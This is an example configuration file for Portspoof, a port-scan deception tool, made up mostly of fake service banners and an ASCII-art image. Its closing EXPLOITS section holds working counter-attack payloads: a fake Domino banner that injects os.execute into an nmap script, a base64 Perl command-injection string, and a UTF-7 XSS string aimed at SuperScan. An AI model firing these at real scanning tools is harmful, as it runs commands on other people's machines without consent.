# This is an example Portspoof configuration file # # :Examples: # # 1. SINGLE PORT # # port "payload" # # 2. PORT RANGE # # port_nr_start-port_nr_start "payload" # # 3. PAYLOAD: Hex Encoded (useful for exploits) # # port "\x20\x20\x41\x41\x41 string payload" # # 4. PAYLOAD: Regular expressions # # port "regular_expression [\w]+ ..." #Example: Send custom payload (this can be a simple string) 1 "550 12345 0000000000000000000000000000000000000000000000000000000" 2 "550 12345 0000000000000000000000000000000000000000000000000000000" 3 "550 12345 0000000000000000000000000000000000000000000000000000000" 4 "550 12345 0000000000000000000000000000000000000000000000000000000" 5 "550 12345 0000000000000000000000000000000000000000000000000000000" 6 "550 12345 0ffffffffffffffffffffffffffffffffffffffffffffffffffff00" 7 "550 12345 0fffffffffffff777778887777777777cffffffffffffffffffff00" 8 "550 12345 0fffffffffff8000000000000000008888887cfcfffffffffffff00" 9 "550 12345 0ffffffffff80000088808000000888800000008887ffffffffff00" 10 "550 12345 0fffffffff70000088800888800088888800008800007ffffffff00" 11 "550 12345 0fffffffff000088808880000000000000088800000008fffffff00" 12 "550 12345 0ffffffff80008808880000000880000008880088800008ffffff00" 13 "550 12345 0ffffffff000000888000000000800000080000008800007fffff00" 14 "550 12345 0fffffff8000000000008888000000000080000000000007fffff00" 15 "550 12345 0ffffff70000000008cffffffc0000000080000000000008fffff00" 16 "550 12345 0ffffff8000000008ffffff007f8000000007cf7c80000007ffff00" 17 "550 12345 0fffff7880000780f7cffff7800f8000008fffffff80808807fff00" 18 "550 12345 0fff78000878000077800887fc8f80007fffc7778800000880cff00" 19 "550 12345 0ff70008fc77f7000000f80008f8000007f0000000000000888ff00" 20 "550 12345 0ff0008f00008ffc787f70000000000008f000000087fff8088cf00" 21 "550 12345 0f7000f800770008777000000000000000f80008f7f70088000cf00" 22 "550 12345 0f8008c008fff8000000000000780000007f800087708000800ff00" 23 "550 12345 0f8008707ff07ff8000008088ff800000000f7000000f800808ff00" 24 "550 12345 0f7000f888f8007ff7800000770877800000cf780000ff00807ff00" 25 "550 12345 0ff0808800cf0000ffff70000f877f70000c70008008ff8088fff00" 26 "550 12345 0ff70800008ff800f007fff70880000087f70000007fcf7007fff00" 27 "550 12345 0fff70000007fffcf700008ffc778000078000087ff87f700ffff00" 28 "550 12345 0ffffc000000f80fff700007787cfffc7787fffff0788f708ffff00" 29 "550 12345 0fffff7000008f00fffff78f800008f887ff880770778f708ffff00" 30 "550 12345 0ffffff8000007f0780cffff700000c000870008f07fff707ffff00" 31 "550 12345 0ffffcf7000000cfc00008fffff777f7777f777fffffff707ffff00" 32 "550 12345 0cccccff0000000ff000008c8cffffffffffffffffffff807ffff00" 33 "550 12345 0fffffff70000000ff8000c700087fffffffffffffffcf808ffff00" 34 "550 12345 0ffffffff800000007f708f000000c0888ff78f78f777c008ffff00" 35 "550 12345 0fffffffff800000008fff7000008f0000f808f0870cf7008ffff00" 36 "550 12345 0ffffffffff7088808008fff80008f0008c00770f78ff0008ffff00" 37 "550 12345 0fffffffffffc8088888008cffffff7887f87ffffff800000ffff00" 38 "550 12345 0fffffffffffff7088888800008777ccf77fc777800000000ffff00" 39 "550 12345 0fffffffffffffff800888880000000000000000000800800cfff00" 40 "550 12345 0fffffffffffffffff70008878800000000000008878008007fff00" 41 "550 12345 0fffffffffffffffffff700008888800000000088000080007fff00" 42 "550 12345 0fffffffffffffffffffffc800000000000000000088800007fff00" 43 "550 12345 0fffffffffffffffffffffff7800000000000008888000008ffff00" 44 "550 12345 0fffffffffffffffffffffffff7878000000000000000000cffff00" 45 "550 12345 0ffffffffffffffffffffffffffffffc880000000000008ffffff00" 46 "550 12345 0ffffffffffffffffffffffffffffffffff7788888887ffffffff00" 47 "550 12345 0ffffffffffffffffffffffffffffffffffffffffffffffffffff00" 48 "550 12345 0000000000000000000000000000000000000000000000000000000" 49 "550 12345 0000000000000000000000000000000000000000000000000000000" 50 "550 12345 0000000000000000000000000000000000000000000000000000000" #Example: port range 51-60 "550 4m2v4 (FUZZ_HERE)" #Example: Simple regular expression payloads 8080 "word: [\w]+ [\d]+ [a-b]+ [1-2]+\n" 8081 "OK0100 eXtremail V([\d.]+) release (\d+) REMote management \.\.\.\r\n" 8082 "word: ... \. \d \w \n" #Nmap regular expression matched payloads 8100 "220 FUZZ_HERE ESMTP OpenSMTPD\r\n" 8101 "220 FUZZ_HERE SMTP ready to roll\r\n" 8102 "550 12345 FUZZ_HERE" 8103 "+OK Lotus Notes POP3 server version lLlfMoHcd ready j* on __FUZZ_HERE__\r\n" 8104 "HTTP/1.0 200 OK\r\nServer: Apache/__FUZZ__(Amazon)\r\nX-Powered-By: ASP\.NET\r\nCache-Control: no-cache, must-revalidate\r\nContent-type: text/html\r\nX-Powered-By: PHP/xxx\r\nExpires: Mon, 26 Jul 1997 05:00:00 GMT\r\nLog In - Juniper Web Device Manager
Apache mod_perl/2.0.4 Perl/v5.10.1 Server at devtest.myhost.co.za Port 80
" ## EXPLOITS ## # NMAP # nmap --script http-domino-enum-passwords.nse -p 80 172.16.37.145 -sC -PN -n --script-args domino-enum-passwords.username='xxx',domino-enum-passwords.password='secr',domino-enum-passwords.idpath='/tmp/' -d4 80 "HTTP/1\.0 200 OK\r\nServer: Apache/(IBM_Lotus_Domino_v\.6\.5\.\d)\r\n\r\n--\r\n--\r\n--\r\n--\r\n\r\n--\r\n--
\r\n--\r\n--\r\nos\x2eexecute\x28\x22echo 'You have been PWNed';whoami; uname -a\x22\x29;\x0d\x0a\x0d\x0a" #OS cmd injection payload for bash: $(cat output) and `cat output` injections 8080 "/bin/bash\t-c\t{perl,-e,$0,useSPACEMIME::Base64,cHJpbnQgIlBXTkVEXG4iIHggNSA7ICRfPWBwd2RgOyBwcmludCAiXG51cGxvYWRpbmcgeW91ciBob21lIGRpcmVjdG9yeTogIiwkXywiLi4uIFxuXG4iOw==}\t$_=$ARGV\x5b0\x5d;~s/SPACE/\x5ct/ig;eval;$_=$ARGV\x5b1\x5d;eval\x28decode_base64\x28$_\x29\x29;" #McAffe SuperScan UTF7 XSS payload 1010 "+ADw-img src=x onerror='a setter=alert,a=\x22UTF-7-XSS\x22;'+AD4-"